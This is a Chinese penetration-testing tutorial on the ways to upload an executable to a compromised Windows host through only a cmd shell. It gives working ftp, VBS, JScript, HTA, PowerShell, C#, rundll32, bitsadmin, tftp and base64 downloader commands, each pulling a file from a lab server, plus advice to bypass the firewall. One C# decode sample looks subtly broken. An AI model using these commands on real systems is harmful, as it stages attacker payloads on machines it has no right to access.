滲透技巧——透過cmd上傳檔案的N種方法
0x00 前言
在滲透測試的過程中,常常需要向目標主機上傳檔案,我在最近的學習測試過程中就碰到了這個問題,要求只能透過cmd shell向目標主機(Windows系統)上傳檔案,所以本文就對該技巧做一下總結。
0x02 測試環境
OS:Win7 x86
test exe:ssss2.exe,成功執行後輸出1
0x03 通用上傳方法
1、 debug
debug是一個程式除錯工具,功能包括:
- 直接輸入,更改,跟蹤,執行組合語言源程式
- 觀察作業系統的內容
- 檢視ROM BIOS的內容
- 觀察更改RAM內部的設定值
- 以扇區或檔案的方式讀寫軟盤資料
特別的是它還有一個功能可以將十六進位制程式碼轉換為可執行檔案:
結合本文的目標,思路如下:
- 把需要上傳的exe轉換成十六進位制hex的形式
- 透過echo命令將hex程式碼寫入檔案
- 使用debug功能將hex程式碼還原出exe檔案
實際測試:
kali中的exe2bat.exe提供了這個功能,位於/usr/share/windows-binaries
如圖
操作步驟:
kali:
#!bash
cd /usr/share/windows-binaries
wine exe2bat.exe ssss2.exe ssss2.txt
執行後會生成ssss2.txt,將裡面的內容複製貼上到cmd命令列下依次執行
執行後會生成1.dll、123.hex、ssss.exe
如圖
注:
exe2bat不支援大於64kb的檔案 debug預設只支援在32位系統
如圖
2、ftp
搭建好ftp伺服器:
ip:192.168.174.151
檔案:ssss2.exe
按順序執行如下程式碼即可透過ftp來下載檔案
cmd:
#!bash
echo open 192.168.174.151 21> ftp.txt
echo ftp>> ftp.txt
echo bin >> ftp.txt
echo ftp>> ftp.txt
echo GET ssss2.exe >> ftp.txt
ftp -s:ftp.txt
如圖
注:
初次使用ftp下載防火牆會彈框攔截,使用前記得要先新增防火牆規則
3、vbs
vbs downloader,使用msxml2.xmlhttp和adodb.stream物件
如下程式碼儲存為.vbs檔案:
#!vb
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://192.168.174.145/ssss2.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "C:\test\update\ssss2.exe",2
對應到cmd下的命令為:
#!bash
echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs
echo Post.Open "GET","http://192.168.174.145/ssss2.exe",0 >>download.vbs
echo Post.Send() >>download.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs
echo aGet.Mode = 3 >>download.vbs
echo aGet.Type = 1 >>download.vbs
echo aGet.Open() >>download.vbs
echo aGet.Write(Post.responseBody) >>download.vbs
echo aGet.SaveToFile "C:\test\update\ssss2.exe",2 >>download.vbs
按順序依次執行後會生成download.vbs,然後執行download.vbs即可實現下載ssss2.exe
4、powershell
cmd:
#!powershell
powershell (new-object System.Net.WebClient).DownloadFile( 'http://192.168.174.145/ssss2.exe','C:\test\update\ssss2.exe')
5、csc
csc.exe是微軟.NET Framework 中的C#編譯器,Windows系統中預設包含,可在命令列下將cs檔案編譯成exe
c# downloader的程式碼為:
#!csharp
using System.Net;
namespace downloader
{
class Program
{
static void Main(string[] args)
{
WebClient client = new WebClient();
string URLAddress = @"http://192.168.174.145/ssss2.exe";
string receivePath = @"C:\test\update\";
client.DownloadFile(URLAddress, receivePath + System.IO.Path.GetFileName
(URLAddress));
}
}
}
使用echo將程式碼依次寫入檔案download.cs中,然後呼叫csc.exe編譯cs檔案
執行
#!bash
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:C:\tes
t\update\download.exe C:\test\update\download.cs
如圖成功生成download.exe
注:
csc.exe的絕對路徑要根據系統的.net版本來確定
6、JScript
相比於JSRat中用的Scripting.FileSystemObject
換用ADODB.Stream實現起來更加簡單高效
以下程式碼依次儲存為js檔案,直接執行即可實現下載檔案
#!js
var Object = WScript.CreateObject("MSXML2.XMLHTTP");
Object.open("GET","http://192.168.174.145/ssss2.exe",false);
Object.send();
if (Object.Status == 200)
{
var Stream = WScript.CreateObject("ADODB.Stream");
Stream.Open();
Stream.Type = 1;
Stream.Write(Object.ResponseBody);
Stream.SaveToFile("C:\\test\\update\\ssss2.exe", 2);
Stream.Close();
}
合併成rundll32的一句話(類似於JSRat的啟動方式):
cmd:
#!bash
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();Object=new%20ActiveXObject("Microsoft.XMLHTTP");Object.open("GET","http://192.168.174.145/ssss2.exe",false);Object.send();if(Object.Status==200){Stream=new%20ActiveXObject("ADODB.Stream");Stream.Open();Stream.Type=1;Stream.Write(Object.ResponseBody);Stream.SaveToFile("C:\\test\\update\\ssss2.exe",2);Stream.Close();}
執行後會提示沒有許可權,很有趣的地方,更多的細節會在以後的文章介紹
7、hta
新增最小化和自動退出hta程式的功能,執行過程中會最小化hta視窗,下載檔案結束後自動退出hta程式
以下程式碼儲存為.hta檔案:
#!js
<html>
<head>
<script>
var Object = new ActiveXObject("MSXML2.XMLHTTP");
Object.open("GET","http://192.168.174.145/ssss2.exe",false);
Object.send();
if (Object.Status == 200)
{
var Stream = new ActiveXObject("ADODB.Stream");
Stream.Open();
Stream.Type = 1;
Stream.Write(Object.ResponseBody);
Stream.SaveToFile("C:\\test\\update\\ssss2.exe", 2);
Stream.Close();
}
window.close();
</script>
<HTA:APPLICATION ID="test"
WINDOWSTATE = "minimize">
</head>
<body>
</body>
</html>
8、bitsadmin
bitsadmin是一個命令列工具,可用於建立下載或上傳工作和監測其進展情況。xp以後的Windows系統自帶
使用方法:
cmd下:
#!bash
bitsadmin /transfer n http://download.sysinternals.com/files/PSTools.zip C:\test\update\PSTools.zip
下載成功如圖:
注:
不支援https、ftp協議
使用kali的simplehttpserver作伺服器會報錯
9、base64
將exe先作base64加密,透過cmd上傳後解密輸出 對exe作base64加密的方法:
(1)powershell
$PEBytes = [System.IO.File]::ReadAllBytes("C:\windows\system32\calc.exe")
$Base64Payload = [System.Convert]::ToBase64String($PEBytes)
Set-Content base64.txt -Value $Base64Payload
執行後會將C:\windows\system32\calc.exe作base64加密並輸出到base64.txt
(2)c#
using System;
using System.IO;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace test1
{
class Program
{
static void Main(string[] args)
{
byte[] AsBytes = File.ReadAllBytes(@"C:\windows\system32\calc.exe");
String AsBase64String = Convert.ToBase64String(AsBytes);
StreamWriter sw = new StreamWriter(@"C:\test\base64.txt");
sw.Write(AsBase64String);
sw.Close();
}
}
}
(3)eml附件
(思路由豬豬俠提供)
server2003 預設包含outlook客戶端C:\Program Files\Outlook Express
執行後-新建郵件-上傳附件-另存為eml格式
使用notepad開啟eml郵件,可看到加密的base64程式碼
如圖
解密base64檔案並生成exe的方法:
(1)powershell
$Base64Bytes = Get-Content (base64.txt)
$PEBytes= [System.Convert]::FromBase64String($Base64Bytes)
Set-Content calc.exe -Value $PEBytes
(2)c#
using System;
using System.IO;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace test1
{
class Program
{
static void Main(string[] args)
{
byte[] AsBytes = File.ReadAllBytes(@"C:\test\base64.txt");
String AsBase64String = Convert.FromBase64String(AsBytes);
StreamWriter sw = new StreamWriter(@"C:\test\calc.exe");
sw.Write(AsBase64String);
sw.Close();
}
}
}
注: 讀檔案的操作可替換為base64程式碼直接寫入指令碼檔案中
0x04 補充上傳方法
以上均為系統預設包含的程式,結合以上方法並藉助於第三方工具也能夠實現功能
這裡介紹的思路是可先透過bitsadmin來下載第三方工具,然後利用第三方工具進行傳輸檔案
1、wget:
#!bash
bitsadmin /transfer n http://www.interlog.com/~tcharron/wgetwin-1_5_3_1-binary.zip C:\test\update\wget.zip
執行後會下載wget的壓縮包wget.zip
注:
Windows系統預設不包含解壓縮zip檔案的命令,但是可以透過vbs來實現解壓縮zip檔案
vbs實現解壓縮:
以下程式碼儲存為.vbs檔案:
#!vb
UnZip "C:\test\update\wget.zip","C:\test\update\wget\"
Sub UnZip(ByVal myZipFile, ByVal myTargetDir)
Set fso = CreateObject("Scripting.FileSystemObject")
If NOT fso.FileExists(myZipFile) Then
Exit Sub
ElseIf fso.GetExtensionName(myZipFile) <> "zip" Then
Exit Sub
ElseIf NOT fso.FolderExists(myTargetDir) Then
fso.CreateFolder(myTargetDir)
End If
Set objShell = CreateObject("Shell.Application")
Set objSource = objShell.NameSpace(myZipFile)
Set objFolderItem = objSource.Items()
Set objTarget = objShell.NameSpace(myTargetDir)
intOptions = 256
objTarget.CopyHere objFolderItem, intOptions
End Sub
成功解壓縮後就可透過wget.exe來傳輸檔案
#!bash
C:\test\update\wget\wget.exe http://192.168.174.145/ssss2.exe
如圖
2、ftfp
思路同上,先透過bitsadmin下載tftp.exe,然後利用tftp傳輸檔案
#!bash
bitsadmin /transfer n http://www.winagents.com/downloads/tftp.exe C:\test\update\tftp.exe
下載成功後利用tftp傳輸檔案:
#!bash
tftp -i 192.168.174.151 GET tftp\ssss2.exe C:\test\update\ssss2.exe
注:
預設防火牆會攔截
關掉防火牆或者新增規則即可
如圖
0x05 小結
本文對一些常用的透過cmd來傳輸檔案的技巧做了整理,側重於介紹其中較為通用簡便的方法,所以並未介紹其他需要配置開發環境的實現方法,如Python、Ruby、Php等,如果你有更好的實現方法,歡迎與我交流,共同學習。
0x06 參考資料
- http://ly0n.me/2015/10/21/uploading-files-to-compromised-systems/
- https://blog.netspi.com/15-ways-to-download-a-file/
- http://demon.tw/programming/vbs-download-file.html
- http://demon.tw/programming/vbs-unzip-file.html
本文由三好學生原創並首發於烏雲drops,轉載請註明
相關文章
- <web滲透-檔案上傳漏洞>Web
- 檔案上傳漏洞全面滲透姿勢總結
- 網站漏洞測試 檔案上傳漏洞的安全滲透與修復網站
- 內網滲透應用 跨vlan滲透的一種思路內網
- 滲透測試技巧總結
- 內網滲透-初探域滲透內網
- 第六章-實用滲透技巧-1:針對雲環境的滲透
- 滲透測試之本地檔案包含(LFI)
- 滲透測試的WINDOWS NTFS技巧集合(一)Windows
- 滲透測試的WINDOWS NTFS技巧集合(二)Windows
- 透過二維碼傳輸檔案到linuxLinux
- linux滲透測試技巧2則Linux
- [Tools]內網滲透SMB轉發技巧內網
- kali滲透測試工具方法
- 如何使用 rsync 透過 SSH 恢復部分傳輸的檔案
- wifi滲透WiFi
- 滲透專案1-GoldenEyeGo
- 域滲透之利用WMI來橫向滲透
- 滲透測試工具實戰技巧合集
- 滲透測試技巧總結更新篇2
- 透過trace檔案重新建立控制檔案
- metasploit滲透測試筆記(內網滲透篇)筆記內網
- CSS實現水平、垂直居中,N種方法,徹底說透!CSS
- 滲透測試對檔案包含漏洞網站檢測網站
- 提權、滲透、經驗、技巧總結大全三
- 滲透測試會用到哪些工具?滲透測試教程
- Kali Linux 安全滲透教程1.2 安全滲透所需工具Linux
- 透過dns進行檔案下載DNS
- 使用java透過http遞交檔案?JavaHTTP
- mysql 透過idb 恢復檔案MySql
- js 透過連結下載檔案JS
- 透過命令列修改nacos配置檔案命令列
- .txt檔案透過Excel拆分行/列Excel
- 什麼是網路滲透測試?網路滲透測試分為幾種型別?型別
- 網站滲透測試漏掃工具的應用技巧網站
- 如何透過 wireshark 捕獲 C# 上傳的圖片C#
- 檔案上傳的幾種方式
- Rails--方法間透過session傳遞引數AISession